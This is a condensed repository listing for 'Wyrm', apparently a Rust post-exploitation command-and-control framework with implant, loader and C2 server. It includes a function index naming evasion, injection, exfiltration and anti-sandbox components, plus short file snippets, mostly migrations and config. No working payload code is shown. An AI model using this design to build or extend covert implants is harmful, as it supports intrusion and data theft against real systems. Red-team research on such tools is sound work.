  function main (line 76) | pub extern "C" fn main() -> i32 {
  function update_service_status (line 96) | pub unsafe fn update_service_status(h_status: SERVICE_STATUS_HANDLE, sta...

FILE: loader/src/utils.rs
  function generate_mutex_name (line 9) | pub fn generate_mutex_name(mutex: &str) -> [u8; MAX_PATH as usize] {

FILE: shared/src/lib.rs
  type StagedResourceDataNoSqlx (line 9) | pub struct StagedResourceDataNoSqlx {

FILE: shared/src/net.rs
  constant NET_XOR_KEY (line 5) | const NET_XOR_KEY: u8 = 0x3d;
  constant STR_CRYPT_XOR_KEY (line 6) | pub const STR_CRYPT_XOR_KEY: u8 = 0x1f;
  constant ADMIN_AUTH_SEPARATOR (line 8) | pub const ADMIN_AUTH_SEPARATOR: &str = "=authdivider=";
  constant ADMIN_ENDPOINT (line 9) | pub const ADMIN_ENDPOINT: &str = "admin";
  constant ADMIN_LOGIN_ENDPOINT (line 10) | pub const ADMIN_LOGIN_ENDPOINT: &str = "admin_login";
  constant NOTIFICATION_CHECK_AGENT_ENDPOINT (line 12) | pub const NOTIFICATION_CHECK_AGENT_ENDPOINT: &str = "check_notifs";
  constant ADMIN_HEALTH_CHECK_ENDPOINT (line 14) | pub const ADMIN_HEALTH_CHECK_ENDPOINT: &str = "/adm/is_logged_in";
  type CompletedTasks (line 16) | pub type CompletedTasks = Vec<Vec<u16>>;
  type TasksNetworkStream (line 17) | pub type TasksNetworkStream = Vec<Vec<u8>>;
  type AdminLoginPacket (line 20) | pub struct AdminLoginPacket {
  type XorEncode (line 25) | pub trait XorEncode {
    method xor_network_stream (line 26) | fn xor_network_stream(self) -> Self;
    method xor_network_stream (line 30) | fn xor_network_stream(mut self) -> Self {
  function encode_u16buf_to_u8buf (line 39) | pub fn encode_u16buf_to_u8buf(input: &[u16]) -> Vec<u8> {
  function decode_u8buf_to_u16buf (line 51) | pub fn decode_u8buf_to_u16buf(input: &[u8]) -> Vec<u16> {
  function decode_http_response (line 64) | pub fn decode_http_response(byte_response: &[u8]) -> Task {

FILE: shared/src/stomped_structs.rs
  type Process (line 13) | pub struct Process {
  type RegQueryResult (line 26) | pub struct RegQueryResult {
    type Error (line 34) | type Error = Vec<String>;
    method try_from (line 36) | fn try_from(value: &str) -> Result<Self, Vec<String>> {
    method client_print_formatted (line 61) | pub fn client_print_formatted(&self) -> Vec<String> {

FILE: shared/src/task_types.rs
  type FileCopyInner (line 5) | pub type FileCopyInner = (String, String);
  type BuildAllBins (line 9) | pub type BuildAllBins = (String, String, String);
  type RegQueryInner (line 11) | pub type RegQueryInner = (String, Option<String>);
  type RegType (line 14) | pub enum RegType {
  type RegAddInner (line 29) | pub type RegAddInner = (String, String, String, RegType);
  type DotExDataForImplant (line 33) | pub type DotExDataForImplant = (Vec<u8>, Vec<String>);

FILE: shared/src/tasks.rs
  type Command (line 22) | pub enum Command {
    method into (line 142) | fn into(self) -> u32 {
    method from_u32 (line 148) | pub fn from_u32(id: u32) -> Self {
    method to_u16_tuple_le (line 153) | pub fn to_u16_tuple_le(&self) -> (u16, u16) {
    method is_autocomplete (line 161) | pub fn is_autocomplete(&self) -> bool {
  type FileDropMetadata (line 66) | pub struct FileDropMetadata {
    method into (line 75) | fn into(self) -> String {
    method from (line 116) | fn from(value: &str) -> Self {
  constant DELIM_FILE_DROP_METADATA (line 72) | pub const DELIM_FILE_DROP_METADATA: &str = ",";
  method fmt (line 171) | fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
  type DotExInner (line 208) | pub struct DotExInner {
    method from (line 233) | pub fn from(tool_path: String, args: Vec<String>) -> Self {
  type InjectInnerForAdmin (line 216) | pub struct InjectInnerForAdmin {
  type InjectInnerForPayload (line 225) | pub struct InjectInnerForPayload {
  type AdminCommand (line 239) | pub enum AdminCommand {
  type Task (line 282) | pub struct Task {
    method from (line 290) | pub fn from(id: i32, command: Command, metadata: Option<String>) -> Se...
    method deserialise_metadata (line 301) | pub fn deserialise_metadata<'a, T: Deserialize<'a>>(
  method fmt (line 313) | fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
  type FirstRunData (line 328) | pub struct FirstRunData {
  function tasks_contains_kill_agent (line 349) | pub fn tasks_contains_kill_agent<T>(tasks: &T) -> bool
  type WyrmResult (line 357) | pub enum WyrmResult<T: Serialize> {
  method fmt (line 363) | fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
  method default (line 372) | fn default() -> Self {
  function unwrap (line 382) | pub fn unwrap(self) -> T {
  function is_err (line 389) | pub fn is_err(&self) -> bool {
  function is_empty (line 400) | pub fn is_empty(&self) -> bool {
  type NewAgentStaging (line 414) | pub struct NewAgentStaging {
    method from_staged_file_metadata (line 447) | pub fn from_staged_file_metadata(staging_endpoint: &str, download_name...
  type StageType (line 477) | pub enum StageType {
  method fmt (line 485) | fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
  type FileUploadStagingFromClient (line 497) | pub struct FileUploadStagingFromClient {
  type PowershellOutput (line 505) | pub struct PowershellOutput {
  type ExfiltratedFile (line 514) | pub struct ExfiltratedFile {
    method new (line 524) | pub fn new(hostname: String, file_path: String, file_data: Vec<u8>) ->...
  type BaBData (line 534) | pub struct BaBData {
    method from (line 539) | pub fn from(implant_key: String) -> Self {
  type Exports (line 546) | pub type Exports = Option<BTreeMap<String, ExportConfig>>;
  type ExportConfig (line 549) | pub struct ExportConfig {
  type StringStomp (line 558) | pub struct StringStomp {
    method from (line 569) | pub fn from(string_stomp: &Option<StringStomp>) -> Option<Self> {

FILE: shared_c2_client/src/lib.rs
  constant ADMIN_AUTH_SEPARATOR (line 6) | pub const ADMIN_AUTH_SEPARATOR: &str = "=authdivider=";
  type NotificationsForAgents (line 9) | pub type NotificationsForAgents = Vec<NotificationForAgent>;
  type AgentC2MemoryNotifications (line 15) | pub type AgentC2MemoryNotifications = (String, bool, Option<Value>);
  type NotificationForAgent (line 20) | pub struct NotificationForAgent {
  function command_to_string (line 30) | pub fn command_to_string(cmd: &Command) -> String {
  type MitreTTP (line 66) | pub struct MitreTTP<'a> {
  function from (line 74) | pub fn from(
  type MapToMitre (line 89) | pub trait MapToMitre<'a> {
    method map_to_mitre (line 90) | fn map_to_mitre(&'a self) -> MitreTTP<'a>;
  method map_to_mitre (line 94) | fn map_to_mitre(&'a self) -> MitreTTP<'a> {
  type TaskExport (line 264) | pub struct TaskExport<'a> {
  function new (line 270) | pub fn new(task: &'a Task, mitre: MitreTTP<'a>) -> Self {
  type StagedResourceData (line 276) | pub struct StagedResourceData {

FILE: shared_no_std/src/export_resolver.rs
  type ExportResolveError (line 22) | pub enum ExportResolveError {
  function get_module_base (line 36) | fn get_module_base(module_name: &str) -> Option<usize> {
  function to_lowercase_ascii (line 109) | fn to_lowercase_ascii(c: u8) -> u8 {
  function strings_equal_ignore_case (line 114) | fn strings_equal_ignore_case(a: &[u8], b: &[u8]) -> bool {
  function resolve_address (line 140) | pub fn resolve_address(
  function get_rva (line 232) | fn get_rva<T>(base_ptr: *mut u8, offset: usize) -> *mut T {
  function find_export_address (line 237) | pub fn find_export_address(
  function rva_from_file (line 282) | unsafe fn rva_from_file<T>(
  type ExportError (line 313) | pub enum ExportError {
  function find_export_from_unmapped_file (line 321) | pub fn find_export_from_unmapped_file(
  function calculate_memory_delta (line 379) | pub fn calculate_memory_delta(buf_start_address: usize, fn_ptr_address: ...
  function find_entrypoint_from_unmapped_image (line 389) | pub fn find_entrypoint_from_unmapped_image(

FILE: shared_no_std/src/memory.rs
  constant G_PFNSE_DLLLOADED_PATTERN (line 9) | const G_PFNSE_DLLLOADED_PATTERN: &[u8] = &[
  constant G_SHIMS_ENABLED_PATTERN (line 21) | const G_SHIMS_ENABLED_PATTERN: &[u8] = &[
  type ShimErrors (line 27) | pub enum ShimErrors {
  function locate_shim_pointers (line 36) | pub fn locate_shim_pointers() -> Result<EarlyCascadePointers, ShimErrors> {
  type EarlyCascadePointers (line 101) | pub struct EarlyCascadePointers {
  function scan_module_for_byte_pattern (line 119) | pub fn scan_module_for_byte_pattern(
Condensed preview — 171 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (752K chars).
[
  {
    "path": ".dockerignore",
    "chars": 52,
    "preview": ".git\n.gitignore\n**/target\n**/*.pdb\n**/*.exe\n**/*.dll"
  },
  {
    "path": ".gitignore",
    "chars": 590,
    "preview": "c2/target\ntarget\nimplant/target\nclient/target\nclient_v2/target\nshared/target\nshared_c2_client/target\n/c2/staged_files/*\n"
  },
  {
    "path": ".vscode/settings.json",
    "chars": 3751,
    "preview": "{\n    \"cSpell.words\": [\n        \"AMSI\",\n        \"antisandbox\",\n        \"appdomain\",\n        \"askama\",\n        \"Autoloot\""
  },
  {
    "path": "CONTRIBUITIONS.md",
    "chars": 520,
    "preview": "# Contributions\n\nContributions as PR's are not currently accepted.\n\nPlease use the issues tab or discussions as required"
  },
  {
    "path": "Cargo.toml",
    "chars": 123,
    "preview": "[workspace]\nresolver = \"2\"\nmembers = [\"c2\", \"client\", \"implant\", \"loader\", \"shared\", \"shared_c2_client\", \"shared_no_std\""
  },
  {
    "path": "LICENCE",
    "chars": 1060,
    "preview": "MIT License\n\nCopyright (c) 2025 flux\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof th"
  },
  {
    "path": "Milestones.md",
    "chars": 6008,
    "preview": "# Project Milestones\n\nAny item with a (L) tag is a contribution which will not be live (or requires further decision mak"
  },
  {
    "path": "RELEASE_NOTES.md",
    "chars": 15580,
    "preview": "# Release Notes\n\nAnything found labelled with a '&#128679;' indicates a possible breaking change to a profile which you "
  },
  {
    "path": "Readme.md",
    "chars": 7791,
    "preview": "# Wyrm - v0.7.2 Hatchling\n\nWyrm (pronounced 'worm', an old English word for 'serpent' or 'dragon') is a post exploitatio"
  },
  {
    "path": "c2/Cargo.toml",
    "chars": 772,
    "preview": "[package]\nname = \"c2\"\nversion = \"0.1.0\"\nedition = \"2024\"\n\n[dependencies]\nshared = { path = \"../shared\" }\naxum = { versio"
  },
  {
    "path": "c2/Dockerfile",
    "chars": 1691,
    "preview": "FROM lukemathwalker/cargo-chef:latest-rust-1.90-bookworm AS chef\nWORKDIR /app\n\nFROM chef AS planner\nWORKDIR /app\nCOPY . "
  },
  {
    "path": "c2/Readme.md",
    "chars": 2046,
    "preview": "# C2\n\nBefore using the C2, you **SHOULD** change the default admin token and database creds found in the `../.env` for s"
  },
  {
    "path": "c2/migrations/20250614124105_agent_table.sql",
    "chars": 125,
    "preview": "-- Add migration script here\nCREATE TABLE agents (\n    id SERIAL PRIMARY KEY,\n    first_check_in TIMESTAMPTZ DEFAULT now"
  },
  {
    "path": "c2/migrations/20250614124140_add_sleep.sql",
    "chars": 43,
    "preview": "ALTER TABLE agents ADD COLUMN sleep BIGINT;"
  },
  {
    "path": "c2/migrations/20250614132037_tasks.sql",
    "chars": 116,
    "preview": "-- Add migration script here\nCREATE TABLE tasks (\n    id SERIAL PRIMARY KEY,\n    uid TEXT NOT NULL,\n    data TEXT\n);"
  },
  {
    "path": "c2/migrations/20250615070633_flesh_table.sql",
    "chars": 345,
    "preview": "-- Add migration script here\nALTER TABLE tasks\n  ADD COLUMN completed   BOOLEAN    NOT NULL DEFAULT FALSE,\n  ADD COLUMN "
  },
  {
    "path": "c2/migrations/20250615072852_add_col_back_tasks.sql",
    "chars": 75,
    "preview": "-- Add migration script here\nALTER TABLE tasks\n  ADD COLUMN command_id INT;"
  },
  {
    "path": "c2/migrations/20250615085223_add_uid.sql",
    "chars": 70,
    "preview": "-- Add migration script here\nALTER TABLE agents\n  ADD COLUMN uid TEXT;"
  },
  {
    "path": "c2/migrations/20250615085245_add_uid.sql",
    "chars": 29,
    "preview": "-- Add migration script here\n"
  },
  {
    "path": "c2/migrations/20250615211204_rm_col_from_tasks.sql",
    "chars": 82,
    "preview": "-- Add migration script here\nALTER TABLE public.tasks\n  DROP COLUMN IF EXISTS uid;"
  },
  {
    "path": "c2/migrations/20250616171233_ch_col.sql",
    "chars": 691,
    "preview": "-- Add migration script here\nBEGIN;\n\nALTER TABLE tasks\n  DROP CONSTRAINT IF EXISTS fk_tasks_agent;\nDROP INDEX IF EXISTS "
  },
  {
    "path": "c2/migrations/20250619055731_results_table.sql",
    "chars": 243,
    "preview": "-- Add migration script here\nCREATE TABLE completed_tasks (\n    id SERIAL PRIMARY KEY,\n    task_id INT NOT NULL,\n    res"
  },
  {
    "path": "c2/migrations/20250621175632_add_time.sql",
    "chars": 101,
    "preview": "-- Add migration script here\nALTER TABLE agents\n  ADD COLUMN last_check_in TIMESTAMPTZ DEFAULT now();"
  },
  {
    "path": "c2/migrations/20250621180355_add_time.sql",
    "chars": 29,
    "preview": "-- Add migration script here\n"
  },
  {
    "path": "c2/migrations/20250622075242_agent_staging.sql",
    "chars": 277,
    "preview": "-- Add migration script here\nCREATE TABLE agent_staging (\n    id SERIAL PRIMARY KEY,\n    date_added TIMESTAMPTZ DEFAULT "
  },
  {
    "path": "c2/migrations/20250622080004_protect_staging.sql",
    "chars": 228,
    "preview": "-- Add migration script here\nALTER TABLE agent_staging\n    ADD CONSTRAINT uq_agent_name UNIQUE (agent_name),\n    ADD CON"
  },
  {
    "path": "c2/migrations/20250622080748_remove_constraint.sql",
    "chars": 98,
    "preview": "-- Add migration script here\nALTER TABLE agent_staging\n  DROP CONSTRAINT IF EXISTS uq_c2_endpoint;"
  },
  {
    "path": "c2/migrations/20250622083052_add_col_staging.sql",
    "chars": 194,
    "preview": "-- Add migration script here\nALTER TABLE agents\n  ADD COLUMN pe_name TEXT;\n\nUPDATE agents\n  SET pe_name = 'oops'\n  WHERE"
  },
  {
    "path": "c2/migrations/20250622094131_add_col_staging_again.sql",
    "chars": 61,
    "preview": "ALTER TABLE agent_staging\n  ADD COLUMN pe_name TEXT NOT NULL;"
  },
  {
    "path": "c2/migrations/20250622094232_del_col_agent.sql",
    "chars": 68,
    "preview": "-- Add migration script here\nALTER TABLE agents DROP COLUMN pe_name;"
  },
  {
    "path": "c2/migrations/20250622122051_protect_pe_name.sql",
    "chars": 102,
    "preview": "-- Add migration script here\nALTER TABLE agent_staging\n    ADD CONSTRAINT uq_pe_name UNIQUE (pe_name);"
  },
  {
    "path": "c2/migrations/20250622130349_port_to_agent_staging.sql",
    "chars": 86,
    "preview": "-- Add migration script here\nALTER TABLE agent_staging\n  ADD COLUMN port INT NOT NULL;"
  },
  {
    "path": "c2/migrations/20250622154423_operator_table.sql",
    "chars": 211,
    "preview": "-- Add migration script here\nCREATE TABLE operators (\n    id SERIAL PRIMARY KEY,\n    date_created TIMESTAMPTZ DEFAULT no"
  },
  {
    "path": "c2/migrations/20250622161952_db_add_cstr.sql",
    "chars": 109,
    "preview": "-- Add migration script here\nALTER TABLE operators\n    ADD CONSTRAINT uq_username_operator UNIQUE (username);"
  },
  {
    "path": "c2/migrations/20250624164511_col_for_toks.sql",
    "chars": 97,
    "preview": "-- Add migration script here\nALTER TABLE agent_staging\n  ADD COLUMN security_token TEXT NOT NULL;"
  },
  {
    "path": "c2/migrations/20250627184526_default_env.sql",
    "chars": 23,
    "preview": "-- actually, not needed"
  },
  {
    "path": "c2/migrations/20250712164452_update_field_for_sleep.sql",
    "chars": 64,
    "preview": "ALTER TABLE agent_staging\n  ALTER COLUMN sleep_time TYPE BIGINT;"
  },
  {
    "path": "c2/migrations/20250712164815_update_field_for_prt.sql",
    "chars": 55,
    "preview": "ALTER TABLE agent_staging\n  ALTER COLUMN port TYPE INT;"
  },
  {
    "path": "c2/migrations/20250712165040_update_field_for_prt_again.sql",
    "chars": 60,
    "preview": "ALTER TABLE agent_staging\n  ALTER COLUMN port TYPE SMALLINT;"
  },
  {
    "path": "c2/migrations/20250719090503_rm_constraint_upload.sql",
    "chars": 97,
    "preview": "-- Add migration script here\nALTER TABLE agent_staging\n  DROP CONSTRAINT IF EXISTS uq_agent_name;"
  },
  {
    "path": "c2/migrations/20250727101559_xor_payload.sql",
    "chars": 95,
    "preview": "-- Add migration script here\nALTER TABLE agent_staging\n  ADD COLUMN xor_key smallint DEFAULT 0;"
  },
  {
    "path": "c2/migrations/20251025085314_update_time_completed_field.sql",
    "chars": 98,
    "preview": "-- Add migration script here\nALTER TABLE completed_tasks\nALTER COLUMN time_completed DROP DEFAULT;"
  },
  {
    "path": "c2/migrations/20251026120715_change_dt_field.sql",
    "chars": 135,
    "preview": "-- Add migration script here\n-- ALTER TABLE completed_tasks\n-- ALTER COLUMN time_completed TYPE BIGINT\n-- USING time_com"
  },
  {
    "path": "c2/migrations/20251026121136_change_dt_field_2.sql",
    "chars": 295,
    "preview": "-- Add migration script here\nALTER TABLE completed_tasks\nADD COLUMN time_completed_ms BIGINT NOT NULL\n    DEFAULT ((EXTR"
  },
  {
    "path": "c2/migrations/20251026122000_time_comp_rm.sql",
    "chars": 84,
    "preview": "-- Add migration script here\nALTER TABLE completed_tasks DROP COLUMN time_completed;"
  },
  {
    "path": "c2/migrations/20251026144632_add_agent_id_to_ct.sql",
    "chars": 146,
    "preview": "-- Add migration script here\nALTER TABLE completed_tasks\n    ADD COLUMN agent_id TEXT;\n\nALTER TABLE completed_tasks\n    "
  },
  {
    "path": "c2/migrations/20251119185937_add_pulled_col.sql",
    "chars": 73,
    "preview": "-- Add migration script here\nALTER TABLE tasks\n  ADD COLUMN fetched BOOL;"
  },
  {
    "path": "c2/migrations/20251127184944_download_col.sql",
    "chars": 107,
    "preview": "-- Add migration script here\nALTER TABLE agent_staging\n    ADD COLUMN num_downloads INT NOT NULL DEFAULT 0;"
  },
  {
    "path": "c2/migrations/20251127193415_make_bigint.sql",
    "chars": 142,
    "preview": "ALTER TABLE agent_staging\n    ALTER COLUMN num_downloads TYPE BIGINT;\n\nALTER TABLE agent_staging\n    ALTER COLUMN num_do"
  },
  {
    "path": "c2/migrations/20251207091938_beacon_console_line.sql",
    "chars": 98,
    "preview": "-- Add migration script here\nINSERT INTO agents (uid, sleep)\nVALUES ('doesntmatterwhatthisis', 1);"
  },
  {
    "path": "c2/migrations/20251207092341_testagent.sql",
    "chars": 108,
    "preview": "-- Add migration script here\nINSERT INTO tasks (agent_id, fetched)\nVALUES ('doesntmatterwhatthisis', false);"
  },
  {
    "path": "c2/migrations/20251215120000_completed_tasks_pending_idx.sql",
    "chars": 161,
    "preview": "-- Add migration script here\nCREATE INDEX IF NOT EXISTS idx_completed_tasks_agent_pending\n  ON completed_tasks (agent_id"
  },
  {
    "path": "c2/migrations/20251215123000_tasks_fetched_default.sql",
    "chars": 206,
    "preview": "-- Add migration script here\nUPDATE tasks\nSET fetched = FALSE\nWHERE fetched IS NULL;\n\nALTER TABLE tasks\n    ALTER COLUMN"
  },
  {
    "path": "c2/src/admin_task_dispatch/dispatch_table.rs",
    "chars": 7023,
    "preview": "use std::sync::Arc;\n\nuse crate::{\n    admin_task_dispatch::{\n        delete_staged_resources, drop_file_handler,\n       "
  },
  {
    "path": "c2/src/admin_task_dispatch/execute.rs",
    "chars": 3360,
    "preview": "use std::{path::PathBuf, sync::Arc};\n\nuse axum::extract::State;\nuse serde_json::Value;\nuse shared::{\n    task_types::Dot"
  },
  {
    "path": "c2/src/admin_task_dispatch/implant_builder.rs",
    "chars": 23674,
    "preview": "use std::{\n    env::current_dir,\n    fs::create_dir_all,\n    path::{Path, PathBuf},\n    sync::Arc,\n};\n\nuse axum::extract"
  },
  {
    "path": "c2/src/admin_task_dispatch/mod.rs",
    "chars": 13158,
    "preview": "use std::{\n    path::{Path, PathBuf},\n    sync::Arc,\n};\n\nuse crate::{\n    DB_EXPORT_PATH, FILE_STORE_PATH,\n    app_stat"
  },
  {
    "path": "c2/src/agents.rs",
    "chars": 9674,
    "preview": "use std::{collections::HashMap, sync::Arc};\n\nuse axum::http::HeaderMap;\nuse chrono::{DateTime, Duration, Utc};\nuse serde"
  },
  {
    "path": "c2/src/api/admin_routes.rs",
    "chars": 8550,
    "preview": "use std::{net::SocketAddr, sync::Arc};\n\nuse crate::{\n    AUTH_COOKIE_NAME, COOKIE_TTL,\n    admin_task_dispatch::{dispatc"
  },
  {
    "path": "c2/src/api/agent_get.rs",
    "chars": 2690,
    "preview": "use std::sync::Arc;\n\nuse crate::{\n    agents::handle_kill_command,\n    app_state::AppState,\n    logging::log_error_async"
  },
  {
    "path": "c2/src/api/agent_post.rs",
    "chars": 9275,
    "preview": "use std::sync::Arc;\n\nuse crate::{\n    EXFIL_PATH,\n    agents::{extract_agent_id, handle_kill_command},\n    app_state::Ap"
  },
  {
    "path": "c2/src/api/mod.rs",
    "chars": 61,
    "preview": "pub mod admin_routes;\npub mod agent_get;\npub mod agent_post;\n"
  },
  {
    "path": "c2/src/app_state.rs",
    "chars": 6469,
    "preview": "use std::{\n    collections::{HashMap, HashSet},\n    env,\n    path::PathBuf,\n    sync::Arc,\n    time::{Duration, Instant}"
  },
  {
    "path": "c2/src/db.rs",
    "chars": 18894,
    "preview": "//! All database related functions\n\nuse std::{\n    collections::{HashMap, HashSet},\n    env,\n    time::Duration,\n};\n\nus"
  },
  {
    "path": "c2/src/exfil.rs",
    "chars": 5607,
    "preview": "use std::path::PathBuf;\n\nuse shared::tasks::{ExfiltratedFile, Task};\nuse tokio::io::AsyncWriteExt;\n\nuse crate::{EXFIL_PA"
  },
  {
    "path": "c2/src/logging.rs",
    "chars": 4828,
    "preview": "use std::{env, fmt::Display, io::Write, path::PathBuf};\n\nuse chrono::{SecondsFormat, Utc};\nuse tokio::io::AsyncWriteExt;"
  },
  {
    "path": "c2/src/main.rs",
    "chars": 7836,
    "preview": "#![feature(map_try_insert)]\n\nuse core::panic;\nuse std::{any::Any, net::SocketAddr, sync::Arc, time::Duration};\n\nuse axum"
  },
  {
    "path": "c2/src/middleware.rs",
    "chars": 7131,
    "preview": "use std::{net::SocketAddr, sync::Arc, time::Instant};\n\nuse axum::{\n    extract::{ConnectInfo, Request, State},\n    http:"
  },
  {
    "path": "c2/src/net.rs",
    "chars": 3976,
    "preview": "//! Module relating to functionality over the wire, such as transformation of data in transit\n\nuse axum::{\n    body::Bod"
  },
  {
    "path": "c2/src/pe_utils/mod.rs",
    "chars": 6005,
    "preview": "use std::{io::SeekFrom, path::Path};\n\nuse chrono::NaiveDateTime;\nuse thiserror::Error;\nuse tokio::{\n    fs::{File, OpenO"
  },
  {
    "path": "c2/src/pe_utils/types.rs",
    "chars": 3297,
    "preview": "#[repr(C)]\n#[allow(non_snake_case, non_camel_case_types)]\npub struct IMAGE_FILE_HEADER {\n    pub Machine: IMAGE_FILE_MAC"
  },
  {
    "path": "c2/src/profiles.rs",
    "chars": 11377,
    "preview": "use std::{\n    collections::{BTreeMap, HashSet},\n    path::{Path, PathBuf},\n};\n\nuse serde::Deserialize;\nuse shared::task"
  },
  {
    "path": "client/Caddyfile",
    "chars": 87,
    "preview": ":3000 {\n    root * /usr/share/caddy\n    file_server\n    try_files {path} /index.html\n}\n"
  },
  {
    "path": "client/Cargo.toml",
    "chars": 636,
    "preview": "[package]\nname = \"client\"\nversion = \"0.1.0\"\nedition = \"2024\"\n\n[dependencies]\nshared = { path = \"../shared\" }\n\nleptos = {"
  },
  {
    "path": "client/Dockerfile",
    "chars": 863,
    "preview": "FROM lukemathwalker/cargo-chef:latest-rust-1.90-bookworm AS chef\n\nFROM chef AS planner\nCOPY Cargo.toml ./\nCOPY c2 /c2\nCO"
  },
  {
    "path": "client/index.html",
    "chars": 1026,
    "preview": "<!DOCTYPE html>\n<html lang=\"en\">\n  <head>\n    <meta charset=\"utf-8\">\n    <meta name=\"viewport\" content=\"width=device-wid"
  },
  {
    "path": "client/src/controller/build_profiles.rs",
    "chars": 1519,
    "preview": "use leptos::wasm_bindgen::JsCast;\nuse web_sys::{\n    Blob, BlobPropertyBag, Url,\n    js_sys::{self, Uint8Array},\n    win"
  },
  {
    "path": "client/src/controller/dashboard.rs",
    "chars": 4478,
    "preview": "use std::{\n    collections::{HashMap, HashSet},\n    str::FromStr,\n};\n\nuse chrono::DateTime;\nuse leptos::prelude::*;\n\nuse"
  },
  {
    "path": "client/src/controller/mod.rs",
    "chars": 2595,
    "preview": "use anyhow::bail;\nuse leptos::prelude::{document, window};\nuse serde::{Serialize, de::DeserializeOwned};\nuse web_sys::Ht"
  },
  {
    "path": "client/src/main.rs",
    "chars": 1288,
    "preview": "use leptos::prelude::*;\nuse leptos_meta::{Meta, Title, provide_meta_context};\nuse leptos_router::{components::*, path};\n"
  },
  {
    "path": "client/src/models/dashboard.rs",
    "chars": 25459,
    "preview": "use std::{\n    collections::{HashMap, HashSet},\n    path::{Path, PathBuf},\n};\n\nuse chrono::{DateTime, Utc};\nuse leptos::"
  },
  {
    "path": "client/src/models/mod.rs",
    "chars": 289,
    "preview": "use serde::Serialize;\n\npub mod dashboard;\n\n#[derive(Serialize, Clone, Debug, Default)]\npub struct LoginData {\n    pub c2"
  },
  {
    "path": "client/src/net.rs",
    "chars": 6752,
    "preview": "use gloo_net::http::{Request, Response};\nuse leptos::prelude::window;\nuse serde_json::Value;\nuse shared::{\n    net::{ADM"
  },
  {
    "path": "client/src/pages/build_profiles.rs",
    "chars": 4749,
    "preview": "use leptos::{component, prelude::*};\nuse shared::tasks::AdminCommand;\n\nuse crate::{\n    controller::build_profiles::trig"
  },
  {
    "path": "client/src/pages/dashboard.rs",
    "chars": 18596,
    "preview": "use std::{\n    collections::{HashMap, HashSet},\n    time::Duration,\n};\n\nuse chrono::Utc;\nuse gloo_timers::future::sleep;"
  },
  {
    "path": "client/src/pages/file_upload.rs",
    "chars": 9500,
    "preview": "use gloo_net::http::Request;\nuse leptos::task::spawn_local;\nuse leptos::wasm_bindgen::JsCast;\nuse leptos::{IntoView, com"
  },
  {
    "path": "client/src/pages/logged_in_headers.rs",
    "chars": 6071,
    "preview": "use leptos::wasm_bindgen::JsCast;\nuse leptos::{IntoView, component, prelude::*, task::spawn_local, view};\nuse leptos_rou"
  },
  {
    "path": "client/src/pages/login.rs",
    "chars": 5306,
    "preview": "use leptos::prelude::*;\nuse leptos_router::hooks::use_navigate;\nuse shared::tasks::AdminCommand;\n\nuse crate::{\n    contr"
  },
  {
    "path": "client/src/pages/logout.rs",
    "chars": 1722,
    "preview": "use leptos::{component, prelude::*};\nuse leptos_router::hooks::use_navigate;\nuse shared::tasks::AdminCommand;\nuse web_sy"
  },
  {
    "path": "client/src/pages/mod.rs",
    "chars": 148,
    "preview": "pub mod build_profiles;\npub mod dashboard;\npub mod file_upload;\npub mod logged_in_headers;\npub mod login;\npub mod logout"
  },
  {
    "path": "client/src/pages/staged_resources.rs",
    "chars": 4275,
    "preview": "use leptos::{component, prelude::*};\nuse shared::StagedResourceDataNoSqlx;\nuse shared::tasks::{AdminCommand, WyrmResult}"
  },
  {
    "path": "client/src/tasks/mod.rs",
    "chars": 53,
    "preview": "pub mod task_dispatch;\npub mod task_impl;\nmod utils;\n"
  },
  {
    "path": "client/src/tasks/task_dispatch.rs",
    "chars": 5069,
    "preview": "use std::{collections::HashMap, process::exit};\n\nuse chrono::Utc;\nuse leptos::prelude::{RwSignal, Update, Write, use_con"
  },
  {
    "path": "client/src/tasks/task_impl.rs",
    "chars": 30014,
    "preview": "use std::{collections::HashMap, mem::take};\n\nuse chrono::{DateTime, Utc};\nuse leptos::prelude::{Read, RwSignal, Update, "
  },
  {
    "path": "client/src/tasks/utils.rs",
    "chars": 4736,
    "preview": "use std::mem::take;\n\nuse shared::task_types::RegType;\n\n/// Splits a string into exactly `n` chunks, treating quoted subs"
  },
  {
    "path": "client/static/main_styles.css",
    "chars": 4705,
    "preview": ":root{\n  --agents-h: 30%;\n  --input-h: 48px;\n  --bg: rgb(36,39,58);\n  --link: rgb(202, 211, 245);\n  --link-hover: rgb(24"
  },
  {
    "path": "client/static/styles.css",
    "chars": 7190,
    "preview": ":root{\n  --agents-h: 30%;\n  --input-h: 48px;\n  --bg: rgb(36,39,58);\n  --link: rgb(202, 211, 245);\n  --link-hover: rgb(24"
  },
  {
    "path": "docker-compose.yml",
    "chars": 1095,
    "preview": "services: \n  client:\n    container_name: \"client\"\n    build:\n      context: .\n      dockerfile: client/Dockerfile\n    po"
  },
  {
    "path": "implant/.cargo/config.toml",
    "chars": 323,
    "preview": "[target.x86_64-pc-windows-msvc]\nrustflags = [\n    \"-Z\", \"location-detail=none\",\n    # \"-Z\", \"fmt-debug=none\",\n    \"-C\", "
  },
  {
    "path": "implant/Cargo.toml",
    "chars": 1678,
    "preview": "[package]\nname = \"implant\"\nversion = \"0.1.0\"\nedition = \"2024\"\nbuild = \"build.rs\"\n\n[profile.release]\nopt-level = \"z\"\nlto "
  },
  {
    "path": "implant/Readme.md",
    "chars": 4686,
    "preview": "# Wyrm agent\n\nThe Wyrm agent is a post exploitation Red Team framework designed to operate as a RAT.\n\n## How it works\n\n#"
  },
  {
    "path": "implant/build.rs",
    "chars": 8686,
    "preview": "use std::{\n    env,\n    fmt::Write,\n    fs,\n    mem::take,\n    path::{Path, PathBuf},\n    process::Command,\n};\n\nfn main("
  },
  {
    "path": "implant/rust-toolchain.toml",
    "chars": 163,
    "preview": "[toolchain]\n# # Pin nightly such that we dont get any unexpected breaking changes.\n# # We can update this as required in"
  },
  {
    "path": "implant/set_dbg_env.ps1",
    "chars": 729,
    "preview": "# set-debug-env.ps1\n\n# --- DEBUG configuration ---\n$Env:DEF_SLEEP_TIME = '1'\n$Env:C2_HOST = 'http://127.0.0.1'\n$Env:C2_U"
  },
  {
    "path": "implant/src/anti_sandbox/memory.rs",
    "chars": 915,
    "preview": "use windows_sys::Win32::{\n    Foundation::FALSE, System::SystemInformation::GetPhysicallyInstalledSystemMemory,\n};\n\ncons"
  },
  {
